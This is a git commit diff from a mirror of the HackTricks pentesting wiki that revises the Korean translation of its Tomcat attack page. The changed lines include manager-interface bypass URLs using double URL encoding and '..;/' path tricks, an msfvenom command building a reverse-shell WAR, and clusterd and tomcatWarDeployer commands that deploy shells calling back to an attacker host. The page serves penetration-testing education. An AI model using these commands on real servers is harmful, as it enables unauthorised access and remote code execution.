mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-01 00:49:40 +00:00
Translated ['network-services-pentesting/pentesting-web/tomcat/README.md
This commit is contained in:
parent
b6bad310ea
commit
0b22d730c3
1 changed files with 8 additions and 8 deletions
|
@ -75,9 +75,9 @@ Along with setting various parameters in Metasploit to target a specific host.
|
|||
|
||||
### **Double URL Encoding**
|
||||
|
||||
`mod_jk`의 CVE-2007-1860 취약점은 이중 URL 인코딩 경로 탐색을 허용하여, 특별히 제작된 URL을 통해 관리 인터페이스에 무단 접근할 수 있게 합니다.
|
||||
`mod_jk`의 CVE-2007-1860 취약점은 이중 URL 인코딩 경로 탐색을 허용하여, 특별히 조작된 URL을 통해 관리 인터페이스에 무단 접근할 수 있게 합니다.
|
||||
|
||||
Tomcat의 관리 웹에 접근하려면 다음으로 이동하십시오: `pathTomcat/%252E%252E/manager/html`
|
||||
Tomcat의 관리 웹에 접근하려면 다음 경로로 이동하십시오: `pathTomcat/%252E%252E/manager/html`
|
||||
|
||||
### /examples
|
||||
|
||||
|
@ -112,15 +112,15 @@ Apache Tomcat 버전 4.x에서 7.x까지는 정보 노출 및 교차 사이트
|
|||
|
||||
예를 들어, `www.vulnerable.com/lalala/..;/manager/html`에 접근하여 **Tomcat 관리자** 페이지에 접근할 수 있을 것입니다.
|
||||
|
||||
이 트릭을 사용하여 보호된 경로를 우회하는 **또 다른 방법**은 `http://www.vulnerable.com/;param=value/manager/html`에 접근하는 것입니다.
|
||||
**또 다른 방법**으로는 이 트릭을 사용하여 보호된 경로를 우회하는 것이며, `http://www.vulnerable.com/;param=value/manager/html`에 접근하는 것입니다.
|
||||
|
||||
## RCE
|
||||
|
||||
마지막으로, Tomcat 웹 애플리케이션 관리에 접근할 수 있다면, **.war 파일을 업로드하고 배포할 수 있습니다(코드 실행)**.
|
||||
마지막으로, Tomcat 웹 애플리케이션 관리에 접근할 수 있다면 **.war 파일을 업로드하고 배포할 수 있습니다 (코드 실행)**.
|
||||
|
||||
### Limitations
|
||||
|
||||
**충분한 권한**(역할: **admin**, **manager** 및 **manager-script**)이 있는 경우에만 WAR를 배포할 수 있습니다. 이러한 세부정보는 일반적으로 `/usr/share/tomcat9/etc/tomcat-users.xml`에 정의된 _tomcat-users.xml_에서 찾을 수 있습니다(버전마다 다를 수 있음) (자세한 내용은 [POST ](./#post)section).
|
||||
**충분한 권한**(역할: **admin**, **manager** 및 **manager-script**)이 있는 경우에만 WAR 파일을 배포할 수 있습니다. 이러한 세부정보는 일반적으로 `/usr/share/tomcat9/etc/tomcat-users.xml`에 정의된 _tomcat-users.xml_에서 찾을 수 있습니다 (버전마다 다를 수 있습니다) (자세한 내용은 [POST ](./#post)section).
|
||||
```bash
|
||||
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
|
||||
|
||||
|
@ -143,7 +143,7 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit
|
|||
|
||||
1. 배포할 war 파일 생성:
|
||||
```bash
|
||||
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
|
||||
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war
|
||||
```
|
||||
2. `revshell.war` 파일을 업로드하고 접근합니다 (`/revshell/`):
|
||||
|
||||
|
@ -163,7 +163,7 @@ git clone https://github.com/mgeeky/tomcatWarDeployer.git
|
|||
```bash
|
||||
./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/
|
||||
```
|
||||
### Using [Culsterd](https://github.com/hatRiot/clusterd)
|
||||
### [Culsterd](https://github.com/hatRiot/clusterd) 사용하기
|
||||
```bash
|
||||
clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
|
||||
```
|
||||
|
@ -226,7 +226,7 @@ msf> use post/windows/gather/enum_tomcat
|
|||
|
||||
* [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner)
|
||||
|
||||
## 참고자료
|
||||
## 참고문헌
|
||||
|
||||
* [https://github.com/simran-sankhala/Pentest-Tomcat](https://github.com/simran-sankhala/Pentest-Tomcat)
|
||||
* [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf)
|
||||
|
|
Loading…
Reference in a new issue